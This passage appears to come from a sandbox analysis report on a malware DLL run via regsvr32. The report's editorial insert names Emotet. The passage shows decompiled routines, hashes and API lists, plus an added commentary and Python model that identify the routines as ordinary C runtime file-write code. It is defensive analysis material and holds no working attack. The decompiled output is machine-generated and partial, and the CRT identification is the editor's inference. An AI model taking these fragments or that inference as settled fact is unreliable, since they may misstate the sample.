                                                                                            				if (_t167 == 0) goto 0x8000e0f8;
                                                                                            				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                            				r9d = r14d;
                                                                                            				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                            				goto 0x8000e0b0;
                                                                                            				r9d = r14d;
                                                                                            				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
                                                                                            				goto 0x8000e0b0;
                                                                                            				r9d = r14d;
                                                                                            				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                            				goto 0x8000e0b0;
                                                                                            				r8d = r14d;
                                                                                            				_v152 = _v152 & _t180;
                                                                                            				_v128 = _t180;
                                                                                            				_v120 = 0;
                                                                                            				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
                                                                                            				_t116 = GetLastError();
                                                                                            				_v128 = _t116;
                                                                                            				asm("movsd xmm0, [ebp-0x40]");
                                                                                            				asm("movsd [ebp-0x30], xmm0");
                                                                                            				if (_t116 != 0) goto 0x8000e1cc;
                                                                                            				_t117 = _v112;
                                                                                            				if (_t117 == 0) goto 0x8000e1a3;
                                                                                            				if (_t117 != 5) goto 0x8000e193;
                                                                                            				 *((char*)(_t184 + 0x30)) = 1;
                                                                                            				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
                                                                                            				 *((char*)(_t184 + 0x38)) = 1;
                                                                                            				 *(_t184 + 0x34) = _t117;
                                                                                            				goto 0x8000df3f;
                                                                                            				_t204 = _t184;
                                                                                            				E000000011800086B0(_v112, _t204);
                                                                                            				goto 0x8000df3f;
                                                                                            				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
                                                                                            				if ( *_t206 == 0x1a) goto 0x8000e1d3;
                                                                                            				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
                                                                                            				 *((char*)(_t184 + 0x30)) = 1;
                                                                                            				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
                                                                                            				 *((char*)(_t184 + 0x38)) = 1;
                                                                                            				goto 0x8000df3f;
                                                                                            				goto 0x8000e1d5;
                                                                                            				return 0;
                                                                                            			}

                                                                                            0x18000dee0
                                                                                            0x18000dee0
                                                                                            0x18000def6
                                                                                            0x18000defc
                                                                                            0x18000deff
                                                                                            0x18000df05
                                                                                            0x18000df0e
                                                                                            0x18000df10
                                                                                            0x18000df15
                                                                                            0x18000df18
                                                                                            0x18000df1e
                                                                                            0x18000df25
                                                                                            0x18000df2d
                                                                                            0x18000df30
                                                                                            0x18000df35
                                                                                            0x18000df3a
                                                                                            0x18000df42
                                                                                            0x18000df57
                                                                                            0x18000df5b
                                                                                            0x18000df5f
                                                                                            0x18000df67
                                                                                            0x18000df6c
                                                                                            0x18000df73
                                                                                            0x18000df7c
                                                                                            0x18000df84
                                                                                            0x18000df8b
                                                                                            0x18000df8b
                                                                                            0x18000df8f
                                                                                            0x18000df97
                                                                                            0x18000dfa9
                                                                                            0x18000dfb8
                                                                                            0x18000dfc2
                                                                                            0x18000dfc7
                                                                                            0x18000dfde
                                                                                            0x18000dfe0
                                                                                            0x18000dfe9
                                                                                            0x18000e004
                                                                                            0x18000e00a
                                                                                            0x18000e00e
                                                                                            0x18000e010
                                                                                            0x18000e019
                                                                                            0x18000e01e
                                                                                            0x18000e024
                                                                                            0x18000e028
                                                                                            0x18000e02c
                                                                                            0x18000e032
                                                                                            0x18000e034
                                                                                            0x18000e03f
                                                                                            0x18000e043
                                                                                            0x18000e048
                                                                                            0x18000e04f
                                                                                            0x18000e051
                                                                                            0x18000e055
                                                                                            0x18000e05d
                                                                                            0x18000e071
                                                                                            0x18000e073
                                                                                            0x18000e076
                                                                                            0x18000e083
                                                                                            0x18000e085
                                                                                            0x18000e08d
                                                                                            0x18000e090
                                                                                            0x18000e094
                                                                                            0x18000e099
                                                                                            0x18000e09c
                                                                                            0x18000e0ab
                                                                                            0x18000e0b0
                                                                                            0x18000e0b7
                                                                                            0x18000e0cc
                                                                                            0x18000e0ce
                                                                                            0x18000e0d2
                                                                                            0x18000e0d4
                                                                                            0x18000e0d9
                                                                                            0x18000e0de
                                                                                            0x18000e0e4
                                                                                            0x18000e0f1
                                                                                            0x18000e0f6
                                                                                            0x18000e0f8
                                                                                            0x18000e105
                                                                                            0x18000e10a
                                                                                            0x18000e10c
                                                                                            0x18000e119
                                                                                            0x18000e11e
                                                                                            0x18000e12b
                                                                                            0x18000e12e
                                                                                            0x18000e136
                                                                                            0x18000e13a
                                                                                            0x18000e145
                                                                                            0x18000e147
                                                                                            0x18000e14d
                                                                                            0x18000e153
                                                                                            0x18000e158
                                                                                            0x18000e16e
                                                                                            0x18000e170
                                                                                            0x18000e175
                                                                                            0x18000e17a
                                                                                            0x18000e17c
                                                                                            0x18000e180
                                                                                            0x18000e187
                                                                                            0x18000e18b
                                                                                            0x18000e18e
                                                                                            0x18000e196
                                                                                            0x18000e199
                                                                                            0x18000e19e
                                                                                            0x18000e1ad
                                                                                            0x18000e1b2
                                                                                            0x18000e1b4
                                                                                            0x18000e1b8
                                                                                            0x18000e1bc
                                                                                            0x18000e1c3
                                                                                            0x18000e1c7
                                                                                            0x18000e1d1
                                                                                            0x18000e1e5

                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorLastMode
                                                                                            • String ID:
                                                                                            • API String ID: 953036326-0
                                                                                            • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                            • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                            • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                            • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

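The routine above (the function whose body ends at 0x18000e1e5) and the helper E0000000118000DC50 listed next are, on the editor's reading of the visible constants, statically linked C runtime code rather than Emotet logic: the `__pioinfo`-style lookup `table[fd >> 6][fd & 0x3f]` with the text-mode flag tested as `& 0x40`, a `0x0d` emitted before every `0x0a`, `GetLastError() == 5` (ERROR_ACCESS_DENIED) mapped to errno 9 (EBADF), and a zero-byte write returning success only when the first character is `0x1a` (Ctrl-Z) and errno `0x1c` (ENOSPC) otherwise. That pattern matches the UCRT `_write_nolock` text-mode path. The model below is an added illustration written for this page, not code recovered from the sample or taken from the report; the identification as CRT code is the editor's inference, and `FakeHandle`, the simulated `WriteFile`, and the small `map_os_error` table are constructed stand-ins, not the real runtime's structures.

```python
# Added illustration for this page (editor's model, not code recovered from the sample):
# the decompiled routine at 0x18000dee0 reads as the UCRT's _write_nolock text-mode
# path. This models the three behaviours visible in it: LF -> CRLF expansion,
# the "zero bytes written" Ctrl-Z / ENOSPC split, and ERROR_ACCESS_DENIED -> EBADF.
from dataclasses import dataclass, field
from typing import Optional, Tuple

FTEXT = 0x40                 # _osfile flag tested with "& 0x40" in the decompile
ERROR_ACCESS_DENIED = 5      # compared against 5 before storing errno 9
EBADF = 9
ENOSPC = 0x1C                # stored as errno when nothing was written
EINVAL = 22                  # assumed default for unmapped Win32 errors
CTRL_Z = 0x1A                # first byte compared against 0x1a


@dataclass
class FakeHandle:
    """Constructed stand-in for one per-fd slot plus a fake WriteFile target."""
    osfile: int
    accept: Optional[int] = None      # bytes the fake device takes per WriteFile (None = all)
    fail_with: Optional[int] = None   # Win32 error to simulate instead of writing
    written: bytearray = field(default_factory=bytearray)
    errno: Optional[int] = None
    doserrno: Optional[int] = None

    def writefile(self, payload: bytes) -> Tuple[bool, int]:
        """Simulated WriteFile: returns (success, bytes_written)."""
        if self.fail_with is not None:
            return False, 0
        n = len(payload) if self.accept is None else min(self.accept, len(payload))
        self.written.extend(payload[:n])
        return True, n


def translate_text(data: bytes) -> bytes:
    """Text-mode expansion: a 0x0d is emitted before every 0x0a, as the copy loop does."""
    out = bytearray()
    for b in data:
        if b == 0x0A:
            out.append(0x0D)
        out.append(b)
    return bytes(out)


def map_os_error(dos_error: int) -> int:
    """Tiny stand-in for the CRT's Win32-to-errno table (assumed entries, not the real one)."""
    return {2: 2, 6: EBADF, 0x70: ENOSPC}.get(dos_error, EINVAL)


def crt_write(fh: FakeHandle, data: bytes) -> int:
    """Returns source bytes consumed, 0 for the Ctrl-Z case, -1 on error (errno set)."""
    if not data:
        return 0
    text = bool(fh.osfile & FTEXT)
    payload = translate_text(data) if text else data
    ok, n = fh.writefile(payload)
    if not ok:
        # GetLastError() is stored as _doserrno; ERROR_ACCESS_DENIED becomes EBADF.
        fh.doserrno = fh.fail_with
        fh.errno = EBADF if fh.fail_with == ERROR_ACCESS_DENIED else map_os_error(fh.fail_with)
        return -1
    if n == 0:
        if text and data[0] == CTRL_Z:
            return 0              # Ctrl-Z at EOF in text mode: success, nothing written
        fh.errno, fh.doserrno = ENOSPC, 0
        return -1
    # Convert bytes placed on the device back into source bytes (charcount - lfcount).
    consumed = pos = 0
    for b in data:
        step = 2 if text and b == 0x0A else 1
        if pos + step > n:
            break
        pos += step
        consumed += 1
    return consumed
```

For triage the practical consequence is that neither function needs to be reversed further: time is better spent on the callers that hand data to this write path, and on the network and injection signatures listed at the top of the report.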
                                                                                            C-Code - Quality: 29%
                                                                                            			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                            				intOrPtr _v0;
                                                                                            				signed long long _v8;
                                                                                            				signed int _t41;
                                                                                            				signed long long _t62;
                                                                                            				short* _t67;
                                                                                            				signed int* _t68;
                                                                                            				void* _t91;
                                                                                            				void* _t97;
                                                                                            				void* _t99;
                                                                                            				void* _t102;
                                                                                            				void* _t103;
                                                                                            
                                                                                            				_a8 = __rbx;
                                                                                            				_a24 = __rbp;
                                                                                            				E0000000118000F880(0x1470, __rax, _t97, _t99);
                                                                                            				_t62 =  *0x80021010; // 0x5e1a320b5ccd
                                                                                            				_a5176 = _t62 ^ _t91 - __rax;
                                                                                            				r14d = r9d;
                                                                                            				r10d = r10d & 0x0000003f;
                                                                                            				_t103 = _t102 + __r8;
                                                                                            				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
                                                                                            				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                            				if (__r8 - _t103 >= 0) goto 0x8000dd91;
                                                                                            				_t67 =  &_a40;
                                                                                            				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
                                                                                            				_t41 =  *__r8 & 0x0000ffff;
                                                                                            				if (_t41 != 0xa) goto 0x8000dce6;
                                                                                            				 *_t67 = 0xd;
                                                                                            				_t68 = _t67 + 2;
                                                                                            				 *_t68 = _t41;
                                                                                            				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
                                                                                            				_a16 = _a16 & 0x00000000;
                                                                                            				_a8 = _a8 & 0x00000000;
                                                                                            				_v0 = 0xd55;
                                                                                            				_v8 =  &_a1752;
                                                                                            				r9d = 0;
                                                                                            				E0000000118000A154();
                                                                                            				if (0 == 0) goto 0x8000dd89;
                                                                                            				if (0 == 0) goto 0x8000dd79;
                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                            				r8d = 0;
                                                                                            				r8d = r8d;
                                                                                            				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
                                                                                            				if (0 + _a24 < 0) goto 0x8000dd46;
                                                                                            				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
                                                                                            				goto 0x8000dcbd;
                                                                                            				 *((intOrPtr*)(__rcx)) = GetLastError();
                                                                                            				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
                                                                                            			}

                                                                                            0x18000dc50
                                                                                            0x18000dc55
                                                                                            0x18000dc67
                                                                                            0x18000dc6f
                                                                                            0x18000dc79
                                                                                            0x18000dc8a
                                                                                            0x18000dc98
                                                                                            0x18000dc9c
                                                                                            0x18000dcb4
                                                                                            0x18000dcba
                                                                                            0x18000dcbd
                                                                                            0x18000dcc3
                                                                                            0x18000dccb
                                                                                            0x18000dccd
                                                                                            0x18000dcd8
                                                                                            0x18000dcdf
                                                                                            0x18000dce2
                                                                                            0x18000dce6
                                                                                            0x18000dcf8
                                                                                            0x18000dcfa
                                                                                            0x18000dd05
                                                                                            0x18000dd13
                                                                                            0x18000dd26
                                                                                            0x18000dd2b
                                                                                            0x18000dd35
                                                                                            0x18000dd3e
                                                                                            0x18000dd44
                                                                                            0x18000dd46
                                                                                            0x18000dd5b
                                                                                            0x18000dd64
                                                                                            0x18000dd6f
                                                                                            0x18000dd77
                                                                                            0x18000dd7e
                                                                                            0x18000dd84
                                                                                            0x18000dd8f
                                                                                            0x18000ddbf

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID: U
                                                                                            • API String ID: 442123175-4171548499
                                                                                            • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                            • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                            • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                            • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                            • String ID: csm
                                                                                            • API String ID: 2573137834-1018135373
                                                                                            • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                            • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                            • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                            • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursorLoadRegister
                                                                                            • String ID: P
                                                                                            • API String ID: 1693014935-3110715001
                                                                                            • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                            • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                            • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                            • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%